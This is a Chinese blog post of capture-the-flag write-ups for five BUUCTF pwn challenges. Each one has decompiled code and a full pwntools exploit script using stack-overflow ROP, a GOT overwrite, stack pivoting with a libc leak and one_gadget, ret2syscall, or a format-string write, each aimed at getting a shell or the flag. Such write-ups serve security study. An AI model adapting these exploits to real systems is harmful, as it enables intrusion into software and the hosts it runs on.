BUUCTF pwn wp 76 - 80

最新推荐文章于 2022-08-21 14:47:22 发布
最新推荐文章于 2022-08-21 14:47:22 发布
阅读量916 收藏
点赞数 1
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/121343620
版权
本文介绍了三个CTF挑战的解决方案,涉及栈溢出、rop技术、格式字符串漏洞和函数指针篡改。通过这些案例,展示了如何利用缓冲区溢出进行栈迁移,以及如何利用got表替换函数指针来实现ret2libc攻击。此外,还讨论了在不同场景下如何构造payload,包括限制输入长度的情况下的栈迁移和ret2syscall。
摘要由CSDN通过智能技术生成

cmcc_pwnme2

在这里插入图片描述

int __cdecl userfunction(char *src)
{
  char dest[108]; // [esp+Ch] [ebp-6Ch] BYREF

  strcpy(dest, src);
  return printf("Hello, %s\n", src);
}

fmt漏洞但是用不上, 看一下可以利用的函数

int exec_string()
{
  char s; // [esp+Bh] [ebp-Dh] BYREF
  FILE *stream; // [esp+Ch] [ebp-Ch]

  stream = fopen(&string, "r");
  if ( !stream )
    perror("Wrong file");
  fgets(&s, 50, stream);
  puts(&s);
  fflush(stdout);
  return fclose(stream);
}

在这里插入图片描述
向bss中的string传入flag路径
然后调用exec_string读取flag

from pwn import *
from LibcSearcher import *

url, port = "node4.buuoj.cn", 27289
filename = "./pwnme2"
elf = ELF(filename)
# libc = ELF("./")
# context(arch="amd64", os="linux")
context(arch="i386", os="linux")

local = 0
if local:
    context.log_level = "debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    # context.log_level = "debug"
    io = remote(url, port)

def B():
    gdb.attach(io)
    pause()

def pwn():
    # plt_puts = 0x08048490
    # got_puts = 0x0804A028
    plt_gets = 0x08048440
    exec_string = 0x080485CB
    bss_string = 0x0804A060
    
    payload = cyclic(112) + p32(plt_gets) +  p32(exec_string)  + p32(bss_string)
    
    io.recvuntil('Please input:\n')
    io.sendline(payload)
    io.sendline("/flag\x00")
    print(io.recvall())


if __name__ == "__main__":
    pwn()
    io.interactive()

picoctf_2018_got_shell

在这里插入图片描述

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  _DWORD *v3; // [esp+14h] [ebp-114h] BYREF
  int v4; // [esp+18h] [ebp-110h] BYREF
  char s[256]; // [esp+1Ch] [ebp-10Ch] BYREF
  unsigned int v6; // [esp+11Ch] [ebp-Ch]

  v6 = __readgsdword(0x14u);
  setvbuf(_bss_start, 0, 2, 0);
  puts("I'll let you write one 4 byte value to memory. Where would you like to write this 4 byte value?");
  __isoc99_scanf("%x", &v3);
  sprintf(s, "Okay, now what value would you like to write to 0x%x", v3);
  puts(s);
  __isoc99_scanf("%x", &v4);
  sprintf(s, "Okay, writing 0x%x to 0x%x", v4, v3);
  puts(s);
  *v3 = v4;
  puts("Okay, exiting now...\n");
  exit(1);
}

有个后门

int win()
{
  return system("/bin/sh");
}

所以直接覆盖返回地址到后门即可, 不过这个思路有个问题就是不能泄露栈地址, 实际是不可行的
所以换一个思路, 就是用打got表, 换掉puts@got到后门即可

from pwn import *
from LibcSearcher import *

url, port = "node4.buuoj.cn", 27406 
filename = "./PicoCTF_2018_got-shell"
elf = ELF(filename)
# libc = ELF("./")
# context(arch="amd64", os="linux")
context(arch="i386", os="linux")

local = 1
if local:
    context.log_level = "debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

def B():
    gdb.attach(io)
    pause()

def pwn():
    puts_got = elf.got['puts']
    win_addr = elf.sym['win']
    log.info("puts got address: %#x", puts_got)
    # log.info(hex(puts_got))
    io.sendlineafter("4 byte value?\n", hex(puts_got))
    io.recv()
    io.sendline(hex(win_addr))

if __name__ == "__main__":
    pwn()
    io.interactive()

actf_2019_babystack

在这里插入图片描述

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  __int64 result; // rax
  char s[208]; // [rsp+0h] [rbp-D0h] BYREF

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  signal(14, handler);
  alarm(0x3Cu);
  memset(s, 0, sizeof(s));
  puts("Welcome to ACTF's babystack!");
  sleep(3u);
  puts("How many bytes of your message?");
  putchar(62);
  sub_400A1A();
  if ( nbytes <= 0xE0 )
  {
    printf("Your message will be saved at %p\n", s);
    puts("What is the content of your message?");
    putchar(62);
    read(0, s, nbytes);
    puts("Byebye~");
    result = 0LL;
  }
  else
  {
    puts("I've checked the boundary!");
    result = 1LL;
  }
  return result;
}

有限输入, 无整数溢出, 可以覆盖rbp和ret addr, 所以采用
双重栈迁移, 第一次泄露libc, 第二次ret2libc, 打onegadget

from pwn import *
from LibcSearcher import *

url, port = "node4.buuoj.cn", 27035
filename = "./ACTF_2019_babystack"
elf = ELF(filename)
libc = ELF("./libc64-2.27.so")
context(arch="amd64", os="linux")
# context(arch="i386", os="linux")

local = 0
if local:
    context.log_level = "debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

def B():
    gdb.attach(io)
    pause()

def pwn():
    main_addr = 0x00000000004008F6
    leave_ret_addr = 0x0000000000400a18
    pop_rdi_addr = 0x0000000000400ad3
    libc_one_gadget = 0x4f2c5
    '''
    0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
    constraints:
    rsp & 0xf == 0
    rcx == NULL

    0x4f322 execve("/bin/sh", rsp+0x40, environ)
    constraints:
    [rsp+0x40] == NULL

    0x10a38c execve("/bin/sh", rsp+0x70, environ)
    constraints:
    [rsp+0x70] == NULL
    '''
    io.sendlineafter('>', str(0xe0))
    io.recvuntil('Your message will be saved at ')
    s_addr = int(io.recvuntil('\n',drop = True), 16)
    log.info("s buffer address: %#x", s_addr)
    
    payload = cyclic(8) + p64(pop_rdi_addr) + p64(elf.got['puts'])
    payload += p64(elf.plt['puts']) + p64(main_addr) 
    payload += cyclic(0xd0 - len(payload))
    payload += p64(s_addr) + p64(leave_ret_addr)

    io.sendafter('>', payload)
    io.recvuntil('Byebye~\n')
    puts_addr = u64(io.recvuntil('\n',drop = True).ljust(8,b'\x00'))
    libc_base = puts_addr - libc.sym['puts']
    one_gadget_addr = libc_base + libc_one_gadget

    io.sendlineafter('>', str(0xe0))
    io.recvuntil('Your message will be saved at ')
    s_addr = int(io.recvuntil('\n',drop = True), 16)
    log.info("s buffer address: %#x", s_addr)

    payload = cyclic(8) + p64(one_gadget_addr) 
    payload += cyclic(0xd0 - len(payload))
    payload += p64(s_addr) + p64(leave_ret_addr)

    io.sendafter('>', payload)


if __name__ == "__main__":
    pwn()
    io.interactive()

这里解答一下之前某个题, 双重栈迁移打不通的问题, 因为栈迁移会把ebp/rbp pop飞掉, 所以会破坏栈帧结构, 要多次使用漏洞, 需要从main/start开始, 不能直接从vul函数开始, 需要回复回正常栈帧结构.

picoctf_2018_can_you_gets_me

在这里插入图片描述

int vuln()
{
  char v1[24]; // [esp+0h] [ebp-18h] BYREF

  puts("GIVE ME YOUR NAME!");
  return gets(v1);
}

静态编译
ROP + ret2syscall

from pwn import *
from LibcSearcher import *

url, port = "node4.buuoj.cn", 27801
filename = "./PicoCTF_2018_can-you-gets-me"
elf = ELF(filename)
# libc = ELF("./")
# context(arch="amd64", os="linux")
context(arch="i386", os="linux")

local = 0
if local:
    context.log_level = "debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

def B():
    gdb.attach(io)
    pause()

def pwn():
    pop_ebx_addr = 0x080481c9
    pop_ecx_addr = 0x080de955
    pop_edx_addr = 0x0806f02a
    pop_eax_addr = 0x080b81c6
    int_0x80_addr = 0x0806cc25
    gets_addr = elf.sym['gets']
    writable_addr = 0x80eb000
    payload = cyclic(0x18 + 4) + p32(gets_addr) + p32(pop_edx_addr) + p32(writable_addr)
    payload += p32(pop_edx_addr) + p32(0)
    payload += p32(pop_ecx_addr) + p32(0)
    payload += p32(pop_ebx_addr) + p32(writable_addr)
    payload += p32(pop_eax_addr) + p32(0xB) + p32(int_0x80_addr)
    io.sendlineafter("GIVE ME YOUR NAME!\n", payload)
    io.send(b"/bin/sh\x00")

if __name__ == "__main__":
    pwn()
    io.interactive()

mrctf2020_easy_equation

在这里插入图片描述

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [rsp+Fh] [rbp-1h] BYREF

  memset(&s, 0, 0x400uLL);
  fgets(&s, 1023, stdin);
  printf(&s);
  if ( 11 * judge * judge + 17 * judge * judge * judge * judge - 13 * judge * judge * judge - 7 * judge == 198 )
    system("exec /bin/sh");
  return 0;
}

fmt任意地址写, 绕过equation检测, 解一下方程, 得知judge == 2
在这里插入图片描述
凑一个字符, 使得参数地址对齐
在这里插入图片描述
judge在第8个参数
在这里插入图片描述
另外, 64位传参,可能存在被/x00截断的情况, 调试发现按8传参走不通, 补个字符, 按9传参

from pwn import *
from LibcSearcher import *

url, port = "node4.buuoj.cn", 27391
filename = "./mrctf2020_easy_equation"
elf = ELF(filename)
# libc = ELF("./")
context(arch="amd64", os="linux")
# context(arch="i386", os="linux")

local = 0
if local:
    context.log_level = "debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

def B():
    gdb.attach(io)
    pause()

def pwn():
    judge_addr = 0x000000000060105C
    payload = "AA%9$nZZZ".encode() + p64(judge_addr)
    io.sendline(payload)


if __name__ == "__main__":
    pwn()
    io.interactive()
fa1c4
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2532
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2057
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
栈溢出之构造函数覆盖返回地址
iczfy585的博客
10-20 761
栈溢出利用已知函数覆盖返回地址 题目:攻防世界 level2 查看文件的保护,发现没有栈哨,可以考虑覆盖返回地址。 利用IDA进行静态分析,找到vulnerable_function()函数 ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] system("echo Input:"); return read(0, &buf, 0x100u); } read函数读入了0x100的大小到缓冲区,但是缓冲区只
ret2xx----- Pwn中常见的CTF模板命题
weixin_52321473的博客
04-07 1164
其实 这周末我原本是不想写文章的 主要是放假了 但是 我想往常一样登录了百度站长。。。。 我去!!! 我的文章被索引了!!!! 所以呢 我决定多更新点文章出来 而且最近不是有人说看不懂吗 我觉得更新一些可以让人懂的一些东西 但是今天 我还决定把Ret2讲完 本次教学节选于星梦安全团队在Bilibili上发表的视频 部分转载于https://www.anquanke.com/post/id/205858#h2-2 url为 https://www.bilibili.com/video/BV1Uv411j
BUUCTF PWN 刷题 1-15题
农夫果园好好喝的博客
08-21 2137
经典栈溢出漏洞。
[BUUCTF]PWN——picoctf_2018_got_shell
mcmuyanga的博客
01-22 360
picoctf_2018_got_shell 附件 步骤: 例行检查,32位程序,开启了nx 本地试运行一下,看看大概的情况,提示了两个地址 32位ida载入,检索字符串发现了后门,shell_addr=0x804854B main() 让我们将内容写入到我们选择的地址上。一开始想尝试溢出后来发现没有溢出漏洞 那么就根据程序的功能,将后门写入到puts@got上,这样在执行第16行的puts的时候我们就能获取shell了 完整exp from pwn import * r=remote('no
picoctf_2018_got_shell
z1r0的博客
12-30 436
picoctf_2018_got_shell 查看保护 可以将一个地址改掉,直接改exit的got为win的地址即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25944) else: r = process(file_name) elf =
BUUCTF-PWN刷题记录-18(格式化字符串漏洞)
weixin_44145820的博客
05-08 1757
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
BUUCTF 2021-10-4 Pwn
m0_56897090的博客
10-04 414
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffer overflow 0分析EXPXCTF-Mary_Morton分析EXPEXPgift分析EXPfishin
BUUCTF-PWN刷题记录-4
weixin_44145820的博客
04-10 1088
目录hitcontraining_secretgarden hitcontraining_secretgarden 这题需要使用double free size字段的高四位可以不为0
[BUUCTF-pwn]——picoctf_2018_got_shell
Y_peak的博客
02-24 466
[BUUCTF-pwn]——picoctf_2018_got_shell 题目地址:https://buuoj.cn/challenges#picoctf_2018_got_shell 题目: 还是先checksec查看一下,32位程序。 IDA中看看,竟然有后门函数win。 思路 程序中没有栈溢出,也没有格式化字符串漏洞和堆漏洞。 那么我们就可以考虑一下逻辑的漏洞 我们看到v3是一个指针,我们可以向里面写地址(%x是以十六进制读入),然后我们也可以向v4里面写入地址。并且我们可以看到*v3
2020MRCTF - 部分Pwn
weixin_44864859的博客
04-09 333
easyoverflow 保护全开,但这里只需要栈溢出覆盖数据满足check函数判断就好了。 exp: from pwn import * context.log_level = 'debug' p = remote('38.39.244.2',28082) payload="a"*48 + "n0t_r3@11y_f1@g" p.sendline(payload) p.interacti...
python数据库sqlite3_Python标准库14 数据库 (sqlite3)
weixin_39654823的博客
11-21 161
作者:Vamei 出处:http://www.cnblogs.com/vamei 欢迎转载,也请保留这段声明。谢谢!Python自带一个轻量级的关系型数据库SQLite。这一数据库使用SQL语言。SQLite作为后端数据库,可以搭配Python建网站,或者制作有数据存储需求的工具。SQLite还在其它领域有广泛的应用,比如HTML5和移动端。Python标准库中的sqlite3提供该数据库的接口。...
BUUCTF刷题5
m0_51251108的博客
10-30 558
题目:axb_2019_heap:actf_2019_babystack:picoctf_2018_got_shell:[极客大挑战 2019]Not Bad:gyctf_2020_force:picoctf_2018_can_you_gets_me:mrctf2020_easy_equation:wdb_2018_2nd_easyfmt:ciscn_2019_es_1:axb_2019_fmt64: axb_2019_heap: 参考师傅:buuctf axb_2019_heap_R1nd0的博客-CSD
BUUCTF-pwn(10)
njh18790816639的博客
01-08 351
picoctf_2018_shellcode 题目很很简单! from pwn import * context(log_level='debug',os='linux',arch='i386') binary = './PicoCTF_2018_shellcode' r = remote('node4.buuoj.cn',25585) #r = process(binary) elf = ELF(binary) shellcode = asm(shellcraft.sh()) r.recvunti
PWN-PRACTICE-BUUCTF-20
P1umH0的博客
09-07 176
PWN-PRACTICE-BUUCTF-20actf_2019_babystackpicoctf_2018_can_you_gets_mepicoctf_2018_got_shellmrctf2020_easy_equation actf_2019_babystack 两次栈迁移 # -*- coding:utf-8 -*- from pwn import * #context.log_level="debug" #io=process("./ACTF_2019_babystack") io=remote(
21 08 08学习总结
eeeeeight的博客
08-10 1130
21.08.08学习总结 Tags: learning experience 不知道什么时间-不知道什么时间: BUU刷题 re找门: xor: 一个数xor同一个数两次之后仍然是其本身 reverse3: 一个base64的加密, 主函数里有个+i的操作, 把+i消去之后base64解密就行了, 但是因为是萌新第一次接触re的base64, 于是就自己写了个base64的加密与解密练手(ida的ctrl e是直接选取字符串) helloword: jeb打开, 就能直接找到了 SimpleRev: 前面有
[XCTF-pwn] 36_xctf-4th-WHCTF-2017_easypwn
weixin_52640415的博客
03-10 353
snprintf的格式化串中途被覆盖也会生效。 unsigned __int64 m1printf() { char s[1024]; // [rsp+10h] [rbp-BF0h] BYREF char v2[1000]; // [rsp+410h] [rbp-7F0h] BYREF char v3[1024]; // [rsp+7F8h] [rbp-408h] BYREF unsigned __int64 v4; // [rsp+BF8h] [rbp-8h] v4 = __re
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值